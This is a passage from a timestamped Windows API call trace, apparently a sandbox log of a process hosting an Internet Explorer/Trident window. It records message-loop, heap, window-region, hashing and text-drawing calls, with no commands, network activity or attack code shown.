GetCurrentThreadId () returned 0xb48 [0163.802] SetEvent (hEvent=0x668) returned 1 [0163.803] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0163.803] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0163.803] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0163.804] GetAsyncKeyState (vKey=17) returned 0 [0163.805] GetAsyncKeyState (vKey=16) returned 0 [0163.805] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0163.805] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.805] memcpy_s (in: _Destination=0xd6fd40, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd6fd40) returned 0x0 [0163.805] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83130 [0163.806] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.807] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.807] memcpy_s (in: _Destination=0xd6fe60, _DestinationSize=0x118, _Source=0xd6fd40, _SourceSize=0x118 | out: _Destination=0xd6fe60) returned 0x0 [0163.807] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ef0 [0163.807] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.811] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ef0 | out: hHeap=0x5e0000) returned 1 [0163.827] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0163.828] GetMessagePos () returned 0x11e01d6 [0163.828] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x105, wParam=0x1b, lParam=0xe0010001, plResult=0x19a1cc | out: plResult=0x19a1cc) returned 0x1 [0163.828] NtdllDefWindowProc_W () returned 0x0 [0163.829] GetCurrentThreadId () returned 0xb48 [0163.829] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0163.829] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0163.829] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0163.829] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0163.829] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0163.829] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0163.829] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098264833452) returned 1 [0163.830] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.830] malloc (_Size=0xb0) returned 0xc82490 [0163.830] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0163.830] NtdllDefWindowProc_W () returned 0x0 [0163.830] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0163.831] GetAsyncKeyState (vKey=17) returned 0 [0163.831] GetAsyncKeyState (vKey=16) returned 0 [0163.831] GetAsyncKeyState (vKey=18) returned 0 [0163.831] TranslateMessage (lpMsg=0x19a5a8) returned 1 [0163.831] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0163.831] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0163.831] GetCurrentThreadId () returned 0xb48 [0163.831] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0163.832] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0163.832] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0163.832] KillTimer (hWnd=0x30316, uIDEvent=0x200a) returned 1 [0163.832] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3098265126390) returned 1 [0163.832] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0163.833] GetFocus () returned 0x103e2 [0163.833] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.833] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfca44 | out: lpRect=0xcfca44) returned 1 [0163.833] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.833] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3098265205736) returned 1 [0163.833] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0x4010197 [0163.833] CreateRectRgnIndirect (lprect=0x199ca0) returned 0xd040a78 [0163.833] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0163.833] GetRandomRgn (hdc=0x4010197, hrgn=0xd040a78, i=4) returned 1 [0163.833] OffsetRgn (hrgn=0xd040a78, x=-507, y=-333) returned 2 [0163.833] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0163.833] GetRegionData (in: hrgn=0xd040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0163.834] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c540 [0163.834] GetRegionData (in: hrgn=0xd040a78, nCount=0x30, lpRgnData=0x9f6c540 | out: lpRgnData=0x9f6c540) returned 0x30 [0163.834] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.834] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c540 | out: hHeap=0x5e0000) returned 1 [0163.834] DeleteObject (ho=0xd040a78) returned 1 [0163.834] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c188 [0163.834] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c188) returned 0x8b040a6c [0163.834] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c188 | out: hHeap=0x5e0000) returned 1 [0163.834] SelectClipRgn (hdc=0x4010197, hrgn=0x8b040a6c) returned 2 [0163.834] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6bf90 [0163.834] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6bf90) returned 0x22040a81 [0163.834] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6bf90 | out: hHeap=0x5e0000) returned 1 [0163.834] ValidateRgn (hWnd=0x103e2, hRgn=0x22040a81) returned 1 [0163.835] DeleteObject (ho=0x8b040a6c) returned 1 [0163.835] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.835] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0163.836] GetSysColor (nIndex=15) returned 0xf0f0f0 [0163.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0163.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83178 [0163.837] HashData (in: pbData=0x9f83178, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0163.837] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0163.837] HashData (in: pbData=0x9f8317c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0163.837] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83178 | out: hHeap=0x5e0000) returned 1 [0163.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0163.837] HashData (in: pbData=0x9f82f68, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0163.837] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0163.837] HashData (in: pbData=0x9f82f6c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0163.837] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0163.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0163.837] HashData (in: pbData=0x9f82fe0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0163.837] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0163.837] HashData (in: pbData=0x9f82fe4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0163.837] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0163.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ed8 [0163.838] HashData (in: pbData=0x9f82ed8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0163.838] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0163.839] HashData (in: pbData=0x9f82edc, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0163.839] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ed8 | out: hHeap=0x5e0000) returned 1 [0163.839] GetSysColor (nIndex=15) returned 0xf0f0f0 [0163.840] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f08 [0163.840] HashData (in: pbData=0x9f82f08, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0163.840] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0163.840] HashData (in: pbData=0x9f82f0c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0163.840] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f08 | out: hHeap=0x5e0000) returned 1 [0163.840] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fc8 [0163.840] HashData (in: pbData=0x9f82fc8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0163.840] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0163.840] HashData (in: pbData=0x9f82fcc, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0163.840] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fc8 | out: hHeap=0x5e0000) returned 1 [0163.840] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0163.840] HashData (in: pbData=0x9f82f50, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0163.840] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0163.840] HashData (in: pbData=0x9f82f54, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0163.841] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0163.841] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0163.841] HashData (in: pbData=0x9f830d0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0163.841] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0163.841] HashData (in: pbData=0x9f830d4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0163.841] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0163.841] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83040 [0163.841] HashData (in: pbData=0x9f83040, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0163.841] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0163.841] HashData (in: pbData=0x9f83044, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0163.841] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83040 | out: hHeap=0x5e0000) returned 1 [0163.841] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831c0 [0163.841] HashData (in: pbData=0x9f831c0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0163.841] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0163.841] HashData (in: pbData=0x9f831c4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0163.841] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831c0 | out: hHeap=0x5e0000) returned 1 [0163.842] GetSysColor (nIndex=15) returned 0xf0f0f0 [0163.842] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0163.842] HashData (in: pbData=0x9f83028, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0163.842] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0163.842] HashData (in: pbData=0x9f8302c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0163.842] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0163.842] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0163.842] HashData (in: pbData=0x9f82f50, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0163.842] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0163.842] HashData (in: pbData=0x9f82f54, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0163.842] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0163.842] LsSetDoc () returned 0x0 [0163.842] LsCreateLine () returned 0x0 [0163.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.843] LsdnFinishRegular () returned 0x0 [0163.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.843] LsdnFinishRegular () returned 0x0 [0163.844] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.844] LsDisplayLine () returned 0x0 [0163.844] IOleInPlaceFrame:SetMenu (This=0xd90740, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0163.844] IOleInPlaceFrame:SetMenu (This=0xd90720, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0163.844] GetSysColor (nIndex=8) returned 0x0 [0163.844] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.844] GetSysColor (nIndex=8) returned 0x0 [0163.845] LsDestroyLine () returned 0x0 [0163.845] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0163.845] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0163.845] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0163.845] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7c48 [0163.845] HashData (in: pbData=0x9f8302c, cbData=0x4, pbHash=0x9f83030, cbHash=0x2 | out: pbHash=0x9f83030) returned 0x0 [0163.845] HashData (in: pbData=0x6d7c48, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.845] HashData (in: pbData=0x6d7c4a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.845] HashData (in: pbData=0x6d7c4c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.845] HashData (in: pbData=0x6d7c54, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.845] HashData (in: pbData=0x6d7c5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.845] HashData (in: pbData=0x6d7c64, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.845] HashData (in: pbData=0x6d7c66, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.845] HashData (in: pbData=0x6d7c68, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.846] HashData (in: pbData=0x6d7c70, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.846] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0163.846] HashData (in: pbData=0x6d7c7c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.846] HashData (in: pbData=0x6d7c84, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.846] HashData (in: pbData=0x6d7c90, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.846] HashData (in: pbData=0x6d7c94, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.846] HashData (in: pbData=0x6d7c9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.846] HashData (in: pbData=0x6d7ca8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.846] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7c48 | out: hHeap=0x5e0000) returned 1 [0163.846] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0163.846] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.846] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.846] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0163.846] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0163.846] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0163.846] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0163.846] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7858 [0163.847] HashData (in: pbData=0x9f8302c, cbData=0x4, pbHash=0x9f83030, cbHash=0x2 | out: pbHash=0x9f83030) returned 0x0 [0163.847] HashData (in: pbData=0x6d7858, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x6d785a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x6d785c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.847] HashData (in: pbData=0x6d7864, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x6d786c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x6d7874, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x6d7876, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x6d7878, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x6d7880, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0163.847] HashData (in: pbData=0x6d788c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.847] HashData (in: pbData=0x6d7894, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x6d78a0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.847] HashData (in: pbData=0x6d78a4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.847] HashData (in: pbData=0x6d78ac, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.847] HashData (in: pbData=0x6d78b8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7858 | out: hHeap=0x5e0000) returned 1 [0163.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0163.847] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.847] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.847] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0163.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0163.848] GetFocus () returned 0x103e2 [0163.848] GetFocus () returned 0x103e2 [0163.848] GetSysColor (nIndex=15) returned 0xf0f0f0 [0163.849] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0163.849] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0163.849] _CIsqrt () returned 0x407b027f [0163.849] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0163.849] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.849] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.849] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0163.849] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddad8 [0163.850] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.850] HashData (in: pbData=0xd94a80, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0163.851] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddad8 | out: hHeap=0x5e0000) returned 1 [0163.851] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0163.851] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830e8 [0163.851] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d77e8 [0163.851] HashData (in: pbData=0x9f830ec, cbData=0x4, pbHash=0x9f830f0, cbHash=0x2 | out: pbHash=0x9f830f0) returned 0x0 [0163.851] HashData (in: pbData=0x6d77e8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x6d77ea, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x6d77ec, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.852] HashData (in: pbData=0x6d77f4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x6d77fc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x6d7804, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x6d7806, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x6d7808, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x6d7810, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0163.852] HashData (in: pbData=0x6d781c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.852] HashData (in: pbData=0x6d7824, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x6d7830, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.852] HashData (in: pbData=0x6d7834, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.852] HashData (in: pbData=0x6d783c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.852] HashData (in: pbData=0x6d7848, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.852] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d77e8 | out: hHeap=0x5e0000) returned 1 [0163.852] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830e8 | out: hHeap=0x5e0000) returned 1 [0163.852] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.852] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.852] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0163.852] HeapFree 